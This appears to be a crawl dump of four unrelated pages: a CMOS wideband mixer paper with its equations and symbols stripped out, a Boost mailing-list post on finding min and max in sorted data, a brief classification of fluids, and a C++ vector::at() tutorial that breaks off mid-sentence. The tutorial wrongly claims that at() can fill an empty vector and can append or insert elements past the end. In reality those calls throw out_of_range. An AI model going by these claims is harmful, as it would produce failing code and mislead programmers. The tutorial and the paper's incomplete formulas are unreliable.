msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fac96563-38fb-4a2e-b473-e526a41133e5>\",\"WARC-Concurrent-To\":\"<urn:uuid:c33caaef-6b68-4671-a984-5a46e4a1a1a6>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/31621\",\"WARC-Payload-Digest\":\"sha1:5TWRKBIVPMMPZJFF64AOONGAYF63BITB\",\"WARC-Block-Digest\":\"sha1:JZVI7VXCY4DYBCGHI5CEUPOJYAMETCRW\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780055601.25_warc_CC-MAIN-20210917055515-20210917085515-00498.warc.gz\"}"}
https://www.hindawi.com/journals/tswj/2014/683971/
[ "#### Abstract\n\nA low-power wideband mixer is designed and implemented in 0.13 µm standard CMOS technology based on resistive feedback current-reuse (RFCR) configuration for the application of cognitive radio receiver. The proposed RFCR architecture incorporates an inductive peaking technique to compensate for gain roll-off at high frequency while enhancing the bandwidth. A complementary current-reuse technique is used between transconductance and IF stages to boost the conversion gain without additional power consumption by reusing the DC bias current of the LO stage. This downconversion double-balanced mixer exhibits a high and flat conversion gain (CG) of 14.9 ± 1.4 dB and a noise figure (NF) better than 12.8 dB. The maximum input 1-dB compression point (P1dB) and maximum input third-order intercept point (IIP3) are −13.6 dBm and −4.5 dBm, respectively, over the desired frequency ranging from 50 MHz to 10 GHz. The proposed circuit operates down to a supply headroom of 1 V with a low-power consumption of 3.5 mW.\n\n#### 1. Introduction\n\nAs the number of new wireless applications advents tremendously, the demand for additional frequency spectrum allocation has been growing rapidly. However, the former practice of fixed spectrum allocation policy suffers from the low spectrum utilization setback and this sets a limitation in the available spectrum of accommodating the next generation wireless applications and services . The inefficiency in spectrum usage and the shortage in spectrum have motivated the evolution of CRs. CR was deemed to be an innovative approach due to its versatility in the context of sensing local spectrum reliably and utilizing unoccupied frequency spectrum in the targeted spectral range, while abstaining interference for licensed user by favourably altering its receiving and transmitting parameters . The first international regulation which establishes CRs based system is IEEE 802.22, where the access of unlicensed CR devices on (TV) frequency spectrum (54 MHz–862 MHz) is permitted . Due to excessive demand and technology advancement, the CRs have a greater potential to be expanded further from the constraint of TV band .\n\nThe well-defined folded-cascode mixer is envisaged to surmount the drawbacks that exist in the Gilbert cell mixer. Instead of stacking the switching stage above the transconductance stage, the folded-switching stage is a promising solution to overcome the voltage headroom limitation. The folded-cascode mixer presented in exhibits a narrow band response and it is not suitable for CR application. Hence, a wideband matching network is integrated at the input mixer to achieve a wideband operating frequency . The mixer input matching circuit not only is crucial as an interstage matching in cascaded systems, but also is essential to ensure the wide bandwidth performance by providing a low input reflection loss across the frequency range.\n\nThe RFCR mixer [7, 20] with folded-cascode structure is widely adapted in recent reported work due to the inherent wideband input matching characteristic with low NF and high gain. Although the RFCR architecture had shown good inherent performance but there is severe contradiction in improving wideband input matching and noise due to the large gate-source parasitic capacitance of the input stage transistors. Therefore, a π-match LC network is introduced in to enhance the input matching by creating an extra zero while reducing gate noise by series resonance of at high frequencies. The reported low-voltage, low-power RFCR mixer architecture in achieves a high CG over wide range of frequency bandwidth in 65 nm CMOS technology. As the DC current-reuse is not feasible in a folded architecture, the cost of this implementation would be in increased power consumption relative to the technology of implementation.\n\nThe effect of even-order distortion in CRs is more critical than narrow band receivers . This distortion is heavily attributed to the presence of asymmetric mismatch in the downconversion mixer and it causes disturbance to the desired channel. To alleviate this distortion effect, a balanced circuit with differential architecture and symmetrical physical layout is preferred. In this work, a low-voltage, low-power and double-balanced wideband mixer integrates a π-match LC network at the input mixer to meet wideband input matching performance. The complementary current-reuse topology improves the power consumption of mixer while enhancing the RF input transconductance. In addition, an inductive peaking is also employed to improve the mixer noise and conversion gain flatness. The proposed mixer is extracted, simulated, and verified on 0.13 μm standard CMOS platform. This paper is organized as follows. Section 2 reviews and highlights the design limitations and performance trade-offs in conventional RFCR mixer. In Section 3, the circuit topology and operation principles of the proposed mixer are presented. An insight into RFCR mixer operation is given by analyzing the innovative techniques that are adapted to overcome the limitations in confirming the stringent requirements for CR application. Section 4 reports the RC-extracted postlayout simulation results and Section 5 presents the conclusion.\n\n#### 2. Design Challenges\n\nSeveral publications were reported on RFCR architecture [7, 20, 23] which can be amenable to both narrow and wideband applications. The RFCR architecture is more viable design for wideband system due to its inherent wideband input matching, low-power consumption, and high gain characteristics. In typical wide bandwidth application, a flat frequency response of gain and NF is preferred across the operating frequency. However, the conventional RFCR architecture tends to suffer from poor NF performance although the CG can be flattened across the range of wide bandwidth due to intrinsic conflict between flat gain and flat NF [21, 24, 25]. Therefore, the conventional RFCR architecture is reviewed in order to analyse the performance parameter trade-offs, which limit the extension of the operational bandwidth. The architecture of Figure 1(a) illustrates the common single-balanced RFCR mixer with the simplified equivalent small signal representation of the transconductance stage given in Figure 1(b). Transistor represents the RF input transistor; transistor is LO switching pair; capacitor is the DC-decoupling capacitor; capacitor is the emulation of the parasitic capacitance at node while resistors , , and represent the input source resistance, feedback resistor, and load resistor, respectively.\n\nAt low frequency, the frequency-dependent component is negligible. From Figure 1(b), the input impedance, can be defined as follows: where is the open-loop gain, computed as , in which is the RF input transconductance represented as and is . Equation (1) reveals that input impedance of the RFCR circuit is mainly determined by resistor and transconductance . In order to achieve an input reflection coefficient,  dB, with respect to a source impedance of  Ω, yields in a range of 25 Ω to 100 Ω [7, 21].\n\nThe voltage gain and noise factor of the transconductance stage can be derived as where is the ratio between the device transconductance and the zero-bias drain conductance, while is the channel thermal noise coefficient. From (1) and (3), it can be observed that there is a close relationship between input impedance matching and NF. The NF can be significantly improved by increasing the RF input transconductance and the value of resistor at the expense of the input impedance matching performance.\n\nHowever in practical circuit implementation, the parasitic capacitances introduced by the gate of input transistors further exacerbate the input matching especially at high frequencies. The frequency dependent component is taken into account to finalize the limitation of wideband operating bandwidth; thus (1) can be rewritten as follows: where . From (4), as  Ω for the perfect matching condition, the maximum gate-source parasitic capacitance can be expressed as follows: where represents the input port impedance and is the cut-off frequency. Based on (5), at the targeted input matching of −10 dB with an upper corner frequency of 10 GHz respective to a source impedance of  Ω, the maximum capacitance which is contributed from both NMOS and PMOS input transistors equals 200 fF. Evidently, a comparative small parasitic capacitance reflects to a small aspect ratio of RF input transistors which concurrently creates limitation in boosting the RF input transconductance and achieving low noise performance.\n\nIn addition to this trade-off, the investigation of noise contribution from switching stage reveals more setbacks which further degrade the mixer’s performance. The total output noise of a mixer consists of thermal noise and flicker noise. The thermal noise which is mainly dominated by the transconductance stage can be easily reduced by increasing the bias current. The switches in an active mixer predominately contribute towards the growth of flicker noise at the mixer’s output. The flicker noise articulated by the LO switches exists at the output of the mixer via direct and indirect mechanism . The flicker noise in effect through the direct mechanism is due to random modulation of the duty cycle of the output current, whereas through the indirect mechanism it is caused by charging and discharging of the parasitic capacitances between transconductance and LO stages. The output noise current generated by the direct mechanism and indirect mechanism is given as in the following [26, 27]: where is the DC tail current in switching stage, is the equivalent flicker noise of the switching pair, is the slope of LO signal, is the LO period, is the parasitic capacitance at switching tail, is the frequency of LO signal, and is the transconductance of switching transistor. In reference to (6) and (7), the direct and indirect noise currents are evidently proportional to the flicker noise voltage, of LO transistor which is expressed as in the following: where is the technology parameter, and are the effective width and length of LO transistor, respectively, is the oxide capacitance of LO transistor, and is the operating frequency. Apparently, in order to minimize the flicker noise effect caused by the direct mechanism, low DC current at the switching stage and large size of LO transistor are preferred. On the contrary, the larger size of LO switching transistor yields to a larger parasitic capacitance, at node as referred to in Figure 1(a). This results in an increase of noise current from indirect mechanism as can be observed from (7). In addition, the capacitance also creates detrimental effect at high frequency by introducing a low impedance path for RF signal which shunts the RF signal to the ground, thus reducing the CG and adversely limiting the operational bandwidth. This effect can be mathematically proven by deriving the pole frequency of the effective transconductance of the mixer in Figure 1(a) as in the following: where is total resistance at the node . Hence, the pole frequency of the mixer which plays a crucial role in determining the operating bandwidth of the mixer core can be derived as It is noted that the capacitor forms as a low-pass filter at the tail of switching quad, where the gain response rolls off beyond the cut-off frequency. Therefore, it can be concluded that obtaining a large operation bandwidth with relatively large capacitor at node is not feasible. This has driven the need for the exploration of new design technique to achieve large bandwidth performance.\n\n#### 3. Proposed Mixer\n\nThe proposed RFCR mixer illustrated in Figure 2 consists of RF input transistors , current-reuse PMOS bias transistors , feedback resistor , DC-decoupling capacitor , switching transistors , peaking inductor , and passive load of and . The folded architecture is preferred over the conventional series stacking topology due to its merit in low voltage headroom realization. The minimum voltage headroom that can be applied to the designed circuit is approximated as where and are the overdrive voltage of transistors and , respectively, while and are the respective threshold voltage of the transistors and .\n\nThe transconductance stage is realized through the integration of inverter with feedback resistor, . At the transconductance stage, PMOS transistor is stacked at the top of NMOS transistor to form a current-reuse topology. Therefore, the transistor enhances the RF input transconductance to without additional power consumption compared to a single N-type common source amplifier associated with an RF input transconductance, . In addition, the PMOS transistor also provides high intrinsic output impedance to prevent RF signal leakage to the power supply. The resistor is used not only to meet the aspired input impedance matching criterion, but also to reduce the power consumption in line to the elimination of additional biasing circuitry for transistors in the context of self-biased principle. By adapting the complementary current-reuse technique, the DC current from the switching stage is fed into transistor instead of being routed into silicon ground as in a typical folded topology apparently in a quest to boost the gain without additional power consumption. As a result, the NMOS transistor contributes more transconductance than PMOS transistor due to an increased current flow through the transistor ; thus the aspect ratio of transistors and along with feedback resistor is optimized diligently according to (1) and (3).\n\nAs mentioned before, a large aspect ratio of RF input transistors contributes to a respective large gate-source parasitic capacitance at the input stage of the conventional RFCR topology and thus adversely affects the input matching and concurrently reduces the operating bandwidth. Hence, an inductor is placed in series with the gate of the transconductance stage transistors while the input capacitor is placed in parallel to the transconductance stage to extend the input bandwidth of the frequency response in achieving a good matching over the operating frequency range. The capacitor and inductor integrated with the total gate-source capacitance, of input transistors, form a third-order LC ladder low-pass filter. In this approach, the inductor coupled with the capacitor to eliminate the effect of and to resonate out the reactive component of at the desired frequency. Through this technique, the constraints of gate-source parasitic capacitance as described in (5) are relaxed. In preference the transconductance can be increased to achieve higher gain and low noise performance simultaneously by increasing the size of RF input transistor while retaining the operating bandwidth as there is an additional degree of freedom in increasing .\n\nFigure 3 depicts the corresponding half circuit small signal representation of the proposed wideband mixer which is illustrated in Figure 2. The capacitors and represent the parasitic capacitances at nodes and , respectively. To simplify the analysis, the DC blocking capacitor between the transconductance and switching stage is neglected since the impedance in effect of is relatively small at the operating frequency range. The input impedance and the input return loss of the proposed architecture can be derived and expressed as in (12) and (13), respectively, where is total gate-source capacitance of the input transistors and denotes the impedance looking into the resistor . Assume that the π-match LC network is symmetrical for perfect input impedance matching by equating the capacitor to capacitor and which is typically 50 Ω. From (12), a good input matching for this circuit is obtained at frequencies As can be seen from (14), the two frequencies, and , are adjusted to be located at DC and high frequency, respectively. The frequency is optimized to be in the vicinity of frequency in order to maintain an input reflection of below −10 dB across the entire operating frequency confirming a good input matching response inherited. At node of Figure 2, the resistive load, , is designed to be relatively large compared to the impedance looking into the switching transistors; thus the RF signal is driven to subsequent stage through the AC coupling capacitor, . In the worst case scenario, a small amount of RF signal leakage through the load resistor can still be shorted out to ground through the load capacitor instead of being routed to the IF output. Since the impedance looking into transistor at node is also large, the RF signal is forced to enter the switching quad.\n\nA PMOS based local oscillator (LO) switching stage is adopted in place of conventional NMOS transistor as PMOS transistor inherits an intrinsic characteristic of low flicker noise performance and less LO power sensitivity compared to NMOS transistor . In reference to (6), large switching transistors with low LO current are applied to minimize the flicker noise in the direct mechanism. In contrast, a large switching transistor indirectly translates flicker noise to the mixer output due to the presence of large tail capacitance at the switches as described in the previous section. The inherited parasitic capacitance also limits the bandwidth, hence promoting the exploration of inductive peaking technique as illustrated in Figure 2.\n\nThe inductor is placed at the tail of the switches to enhance the bandwidth through a peaking at high frequency without consuming additional power and voltage headroom. The aspect ratio of transistors and switching transistors are selected appropriately to form two suitable parasitic capacitors and at nodes and , respectively. These capacitors form a virtual -network along with inductor , relaxing the requirement of integrating additional capacitors which degrade the CG and NF. From the perspective of transient analysis, the current charges the two capacitors separately through the inductor , at different point of time, resulting in the charging time to be reduced leading to an enhancement in bandwidth. In further analyzing the operation of the peaking inductor , in reference to the frequency response, the LO transistor is modelled as an ON-OFF switch while the resistor represents the resistance at the source terminal of switching transistor as illustrated in Figure 3. Based on this approximated model, the overall conversion gain of the mixer is computed by the following expression: where is the RF input frequency and is the IF output frequency.\n\nThe transfer function of and can be solved by small signal analysis which are given by (16) and (17), respectively, while the transfer function of can be derived adapting Fourier series analysis by approximating the LO signal as an ideal square wave, which is given by (18) Since the impedances looking through the transistors at node and transistor at node are relatively large, hence the intrinsic resistances and in Figure 3 are neglected. With the integration of the peaking inductor, the frequency response of the RF signal in (9) is computed as in (19). The transfer function in (19) can be rewritten in expressing a single real pole and two complex poles as follows: Comparing (19) and (20), the pole factor , the real pole frequency , and the complex pole frequencies can be expressed as follows: Notably, the bandwidth extension is heavily dependent on the value of parasitic capacitances and , inductor , and resistors and . The real pole results in gain and bandwidth reduction at the frequency higher than its value, whereas the complex poles can be adjusted to provide a peaking in frequency response which compensates this adverse effect. Since the real pole is the dominant parameter in achieving a high bandwidth and gain, it should be peaked at the highest frequency as possible, while the location of complex poles are adjusted accordingly to compensate for the gain drop at high frequencies by introducing a peaking and further extending the bandwidth. However, bandwidth enhancement using this approach introduces in-band ripples. Increasing the potentially enhances the gain at the peaking; however increasing excessively would result in bandwidth reduction. Similarly increasing shifts the peaking to higher frequencies; however when is increased excessively, it results in the reduction of gain in reference to (21) and (22). Therefore, and are optimized appropriately to obtain relatively flat and high gain response over the wide bandwidth of operation.\n\nThe mixing point of RF and LO signals is located at the node . The switching quad is biased in the vicinity of the threshold voltage at low bias current, thus reducing the DC offset and flicker noise while resulting in a substantial increase in switching efficiency. The low bias current allows the integration of larger load resistance, thus increasing the CG of the mixer and relaxing the constraint of voltage headroom consumption. Load capacitor couples with the load resistor presenting a low-pass filter at the IF output with the output real pole equal to based on (17). This integration suppresses the feed components of , , and other unwanted harmonics including the higher-order mixing spurs such as , where and are integers. Ultimately, the overall conversion gain of the presented wideband mixer at the desired output spectrum is given by\n\n#### 4. RC-Extracted Simulation Results\n\nThe proposed wideband mixer of Figure 2 has been designed and simulated using 0.13 μm CMOS standard process for regulated CR applications. The layout parasitic extraction (LPE) is executed and validated under Cadence Spectre-RF and Mentor Calibre platform. In an interest of perfect matching and the minimization of mismatch parasitic coupling effect, the components and metal paths in the designed mixer circuit were placed as symmetrical as possible. The physical layout of the circuit including the RF ESD pads is illustrated in Figure 4 with a total chip area consumption of 1.08 × 1.00 mm2.\n\nThe postlayout simulation results were carried out with a total power consumption of 3.5 mW at respective voltage headroom of 1 V. The RF input of the wideband mixer is matched to 50 Ω termination and the respective simulated input return loss, , is illustrated in Figure 5. The of the optimized RFCR wideband mixer is achieved well below −12 dB across the operating frequency ranging from 50 MHz to 10 GHz.\n\nFigure 6 shows the simulated NF versus RF frequency from 50 MHz to 10 GHz with a fixed IF output at 10 MHz while the LO power is set to be 0 dBm. The simulated minimum and maximum NF of the wideband mixer are 10.8 dB and 12.8 dB, respectively. This wideband mixer exhibits a flat NF with a variation of ±1 dB across the entire frequency range. Figure 7 shows the simulated CG versus RF frequency in a comparison plot with the presence of the peaking inductor and absence of the peaking inductor. At low frequency, the CG is observed to be around 16 dB. However, at high frequency range, the CG is achieved to about 8 dB without the peaking inductor in place and about 14 dB with the integration of peaking inductor, resulting in 6 dB of gain improvement. This plot reveals and confirms that the peaking inductor in RFCR mixer had improved the CG at high frequency range. The proposed wideband mixer achieves a high gain with a flatness variation of ±1.4 dB where the maximum CG of 16.3 dB is observed at 500 MHz and a minimum of CG of 13.5 dB is observed at 5.5 GHz.\n\nIn observing the linearity response, the center frequency of 5 GHz from the operating bandwidth is selected. With an LO power of 0 dBm at  MHz, the P1dB is simulated to be −15.8 dBm. Applying two-tone test with 1 MHz frequency offset, the simulated IIP3 is −6.3 dBm as shown in Figure 8. Figure 9 depicts the overall performance of the simulated P1dB and IIP3 against RF frequency of the mixer over the range of 50 MHz to 10 GHz. The mixer achieves a P1dB range of −17.0 dBm to −13.6 dBm while the IIP3 ranges from −8.1 dBm to −4.5 dBm.\n\nThe overall performance of the proposed mixer can be weighed comparatively with other reported works using a figure-of-merits (FOM). Generally, the mixer performance was compared in terms of CG, NF, linearity (IIP3 or input P1dB), and power consumption [29, 30]. However, a trade-off exits between power dissipation and bandwidth in wideband mixer design. Hence, it is essential to include the operating bandwidth parameter into FOM calculation for the fair comparison with the reported works . As a result, a modified FOM is introduced for wideband mixer, which is given as where and represent lower cut-off frequency and upper cut-off frequency, respectively. is the power consumption in Watts. is the maximum conversion gain, is the maximum input third-order intercept point, and is the minimum noise figure. The simulated results of the proposed architecture along with other reported results of the recent works are tabulated in Table 1. The proposed mixer achieves 26.14 dB which is the highest FOM compared to other mixers.\n\n#### 5. Conclusion\n\nIn this work, a new wideband mixer for CR receiver has been successfully designed and simulated in 0.13 μm CMOS process. A π-match LC network is embedded at the input of RFCR architecture to simultaneously enhance the input impedance matching and NF while encapsulating an operating bandwidth as large as 10 GHz. The RFCR adaptation enables the proposed mixer to achieve high gain by summing up the transconductance of NMOS and PMOS in the transconductance stage. The peaking inductor achieves a flat CG response by compensating the gain degradation at high frequencies, while extending the bandwidth. Additionally, the complementary current-reuse technique is implemented at the output stage to further boost the CG without dissipating additional power. The proposed wideband mixer operates from 50 MHz to 10 GHz with an RF input return loss better than −12 dB, a high CG of  dB, a flat NF of  dB, an P1dB of − dBm, and an IIP3 of − dBm. This mixer operates at a low voltage headroom of 1.0 V while consuming only 3.5 mW of power. This characteristic of proposed wideband mixer serves to be a compatible architecture to meet the future growing demands in CR application.\n\n#### Conflict of Interests\n\nThe authors declare that there is no conflict of interests regarding the publication of this paper.\n\n#### Acknowledgment\n\nThis research is supported by the UM High Impact Research Grant UM.C/HIR/MOHE/ENG/51 from the Ministry of Higher Education, Malaysia." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8981266,"math_prob":0.9150288,"size":36086,"snap":"2023-40-2023-50","text_gpt3_token_len":8111,"char_repetition_ratio":0.14289674,"word_repetition_ratio":0.046058457,"special_character_ratio":0.21964197,"punctuation_ratio":0.14210986,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.960772,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-28T17:02:05Z\",\"WARC-Record-ID\":\"<urn:uuid:9ed795cf-29b2-4ff2-a017-1a2d5559d153>\",\"Content-Length\":\"990305\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e49e1ed2-fb15-4ee8-9a54-b41335d837e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:060530d1-84b3-48bd-a459-0189f1a65b7e>\",\"WARC-IP-Address\":\"104.18.40.243\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/tswj/2014/683971/\",\"WARC-Payload-Digest\":\"sha1:ZV6XCQEEZTA33CWJ3GYVFWOBEG4NF6UX\",\"WARC-Block-Digest\":\"sha1:6KNBSHZ6A7AUTK2NX4JRYUEIRY3YBSS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510427.16_warc_CC-MAIN-20230928162907-20230928192907-00740.warc.gz\"}"}
https://lists.boost.org/Archives/boost/2009/05/151970.php
[ "", null, "# Boost :\n\nSubject: [boost] minmax_element and sorted data\nDate: 2009-05-29 10:12:50\n\nI've noticed that minmax_element makes roughly 3n/2 comparisons, though n -\n1 comparisons are all that is required to see if data is sorted, and if it\nis, the minimum and maximum are known. Sorted data is a relatively common\nspecial-case, and I think minmax_element might be better optimized to take\nadvantage of sorted data when it is provided. Also, it would be nice to\nhave a version of it that returns the minimum, maximum, and whether the data\nis sorted.\nAlso worth considering is whether minmax_element can work more efficiently\nwith long chains of sorted (or reverse-sorted) data, by taking advantage of\nthe fact that the maximum and minimum of sorted data is known, and it takes\nn - 1 comparisons to tell whether a list of n items is sorted.\n\nAn example of how sorting can be tested without hurting overall runtime for\nunsorted data is how I find the minimum and maximum for integer_sort. Note\nthat when the data is sorted, it returns with max and min being identical; a\nboolean could provide that information in a more general method.\nSource:\n\n//Find the minimum and maximum using <\ntemplate <class RandomAccessIter>\ninline void\nfind_extremes(RandomAccessIter current, RandomAccessIter last,\nRandomAccessIter & max, RandomAccessIter & min)\n{\nmin = max = current;\n//It is assumed we have more than 1 element; there are multiple\nchecks for this\nwhile(!(*(current + 1) < *current)) {\n//If everything is in sorted order, return\nif(++current == last - 1)\nreturn;\n}\n//The maximum is the last sorted element\nmax = current;\n//Now that we know it isn't sorted, doing an efficient max/min find\nstd::pair<RandomAccessIter, RandomAccessIter> vals =\nminmax_element(++current, last);\nif(*(vals.first) < *min)\nmin = vals.first;\nif(*max < *(vals.second))\nmax = vals.second;\n}" ]
[ null, "https://lists.boost.org/boost/images/boost.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8110765,"math_prob":0.921457,"size":2005,"snap":"2021-31-2021-39","text_gpt3_token_len":498,"char_repetition_ratio":0.13843079,"word_repetition_ratio":0.0,"special_character_ratio":0.24339151,"punctuation_ratio":0.14285715,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9525017,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-21T04:42:43Z\",\"WARC-Record-ID\":\"<urn:uuid:1a665cc2-e301-4a5e-acb8-8c63c88d58e4>\",\"Content-Length\":\"12111\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c64db7b6-529c-4bee-95f3-1f47e984883d>\",\"WARC-Concurrent-To\":\"<urn:uuid:f4a738ef-7a22-462b-99cc-af928c96eb91>\",\"WARC-IP-Address\":\"146.20.110.251\",\"WARC-Target-URI\":\"https://lists.boost.org/Archives/boost/2009/05/151970.php\",\"WARC-Payload-Digest\":\"sha1:43JBDLFT77G57NJNF3MDLYAYWPZ22Y57\",\"WARC-Block-Digest\":\"sha1:M6SVTZRMAVAZ4MG2YFYCXI7UWZPVKK4M\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057158.19_warc_CC-MAIN-20210921041059-20210921071059-00652.warc.gz\"}"}
https://www.electrotechnik.net/2017/05/classification-of-fluids_19.html
[ "# Classification of fluids\n\nFluids are classified into\n\n• Ideal or perfect fluids\n• Real fluids or Practical fluids\n• Newtonian fluids and\n• Non-Newtonian fluids\n\nIdeal fluids\nAn ideal fluid is one which has density as the only property.  The ideal fluid has not viscosity, surface tension, cohesion or adhesion.\n\nReal fluids\nThese are also known as practical fluids. Fluids which have viscosity, surface tension, adhesion and cohesion are called real fluids\nEg. water, oil, air\n\nNewtonian Liquids\nNewtonian liquids are those which obey Newton's law of viscosity\n\nNon-newtonian liquids\nLiquids which do not obey Newton's law of viscosity are called Non-Newtonian liquids." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94843,"math_prob":0.6494663,"size":610,"snap":"2020-45-2020-50","text_gpt3_token_len":139,"char_repetition_ratio":0.21122113,"word_repetition_ratio":0.02173913,"special_character_ratio":0.18852459,"punctuation_ratio":0.10377359,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9709905,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-25T04:40:06Z\",\"WARC-Record-ID\":\"<urn:uuid:f9fd3be0-3a8e-4230-a4d6-d9ef2e5c04cd>\",\"Content-Length\":\"49393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aad5b404-5221-41e0-99e2-6eed60a2bda6>\",\"WARC-Concurrent-To\":\"<urn:uuid:58279755-f599-4a23-8ea7-15dcd630eba9>\",\"WARC-IP-Address\":\"104.27.190.109\",\"WARC-Target-URI\":\"https://www.electrotechnik.net/2017/05/classification-of-fluids_19.html\",\"WARC-Payload-Digest\":\"sha1:3JXYS5LTF3MLRHY6XFT25EGHS6U3SUZR\",\"WARC-Block-Digest\":\"sha1:3HRN4YCHIILFCQ3NDYHXP3ZSUGY5X4VS\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107887810.47_warc_CC-MAIN-20201025041701-20201025071701-00276.warc.gz\"}"}
https://thelinuxcode.com/at-functions-cpp-vector/
[ "# Mastering the C++ Vector at() Function for Safe Access\n\nThe C++ vector is one of the most ubiquitous containers used in modern C++ programming, providing a dynamic array of elements. Flexibly accessing those elements safely is critical for building robust programs that can handle errors.\n\nThat‘s where the powerful at() function comes in for C++ vectors. It enables bounds-checked access to elements along with the ability to leverage exceptions for error handling.\n\nIn this comprehensive guide, we‘ll unpack everything you need to know to master the at() function for C++ vector access and become an expert at harnessing its capabilities in your own code.\n\n## A Deep Dive into Vectors\n\nBefore jumping into the specifics of at(), it‘s useful to step back and understand vectors at a fundamental level.\n\nVectors provide a sequence container that hold a variable number of objects dynamically in memory. This provides a more flexible data structure than fixed C-style arrays where the size cannot change.\n\nSome key capabilities provided by vectors include:\n\n• Dynamic resizing – Add or remove elements at any time\n• Contiguous storage – Elements stored contiguously for cache performance\n• Automated memory management – No manual allocations/deallocation\n• Intuitive syntax – vec.push_back(), vec[i], etc.\n\nThis combination makes vectors incredibly useful in C++ programs. They can be used for anything from storing application data to holding vertices in a game engine.\n\nSome examples of common vector use cases:\n\n• Storing a high score list for a game\n• Queue of network packets waiting to be sent\n• Objects representing rows in a spreadsheet\n• Vertices of a polygon mesh or 3D model\n\nVectors originated in the C++ STL in 1994 based on earlier containers in C. The versatility of vectors has made them a ubiquitous tool for any C++ programmer.\n\nNow let‘s dive into safely accessing elements in a vector using at().\n\n## Proper Syntax and Usage of at()\n\nThe member function syntax for at() is straightforward:\n\n``vector.at(index)``\n\nWhere `vector` is the vector instance, and `index` is the position of the element you want to access.\n\nFor example:\n\n``````std::vector<std::string> fruits {\"apple\", \"banana\", \"orange\"};\n\nstd::string first = fruits.at(0); //gets \"apple\"``````\n\nThis reads the element at index 0 in the fruits vector, returning back the string \"apple\".\n\nWe can also use at() to modify elements already in a vector:\n\n``fruits.at(2) = \"grape\"; //modifies orange -> grape``\n\nAnd loop through all elements printing them:\n\n``````for (int i = 0; i < fruits.size(); i++) {\nstd::cout << fruits.at(i) << \"\\n\";\n} ``````\n\nOne key difference between at() vs [] access is bounds checking. Consider this example:\n\n``````std::vector<int> vec {1, 2}; //size 2\nint a = vec.at(2); //throws out_of_range!``````\n\nAttempting to access index 2 would throw an exception here, since it is past the end of the valid range. With [], this would compile but lead to undefined behavior when run.\n\nSo at() enabled safe access with checks, while [] provides no checks but is faster.\n\n## Accessing Vector Elements\n\nNow let‘s explore some more examples of accessing elements using at():\n\n### Reading User Input into a Vector\n\nWe can build up a vector by reading user input and storing it safely using at():\n\n``````std::vector<int> userNums;\nint input;\n\nfor (int i = 0; i < 5; i++) {\n\nstd::cout << \"Enter number: \";\nstd::cin >> input;\n\nuserNums.at(i) = input; //add to vector\n}``````\n\nThis allows the user to dynamically grow the vector by pushing integers into it. No pre-allocation required!\n\n### Totaling Values in a Vector\n\nTo total all elements in a vector, we can leverage at() for safe indexed access:\n\n``````std::vector<double> purchases {23.5, 10.0, 33.25, 17.0};\n\ndouble total = 0.0;\n\nfor (int i = 0; i < purchases.size(); i++) {\ntotal += purchases.at(i);\n}\n\nstd::cout << \"Total: \" << total; //83.75``````\n\nBy using at() inside the loop, we safely access each element value to sum up.\n\n### Checking for Duplicates\n\nHere is an example of checking if any duplicate values exist in a vector using at():\n\n``````std::vector<std::string> names {\"Sarah\", \"Rashid\", \"Rashid\"};\n\nbool duplicate = false;\n\nfor (int i = 0; i < names.size(); i++) {\nfor (int j = i + 1; j < names.size(); j++) {\nif (names.at(i) == names.at(j)) {\nduplicate = true;\n}\n}\n}\n\nif (duplicate) {\nstd::cout << \"Duplicate found!\\n\";\n} else {\nstd::cout << \"No duplicates.\\n\";\n}``````\n\nBy nesting two loops, we can compare each element against the remaining elements using at() to see if any match.\n\n### Modifying Vector Elements\n\nTo modify an existing element in a vector, we can simply assign to it with at():\n\n``````std::vector<std::string> names {\"Bob\", \"Alice\", \"Joe\"};\n\nnames.at(1) = \"Mary\"; //modifies \"Alice\" to \"Mary\" ``````\n\nThis safely changes the element at index 1 by doing bounds checking before assignment.\n\nWe can also insert or append elements using at():\n\n``````std::vector<int> vec {1, 2, 3};\n\nvec.at(3) = 4; //append 4 to end\n\nvec.at(1) = 10; //insert 10 at index 1``````\n\nInserting requires shifting all following elements over, which at() handles correctly.\n\n### Sorting Elements in a Vector\n\nTo sort a vector in ascending order, we can use a swap pattern leveraging at():\n\n``````std::vector<int> nums {4, 2, 5, 1, 3};\n\n//naive bubble sort\nfor (int i = 0; i < nums.size(); i++) {\nfor (int j = 0; j < nums.size() - 1; j++) {\nif (nums.at(j) > nums.at(j+1)) {\n//swap elements\nint temp = nums.at(j);\nnums.at(j) = nums.at(j+1);\nnums.at(j+1) = temp;\n}\n}\n}\n\n//vector now sorted: {1, 2, 3, 4, 5}``````\n\nBy swapping adjacent elements using at(), we gradually move larger values rightwards until 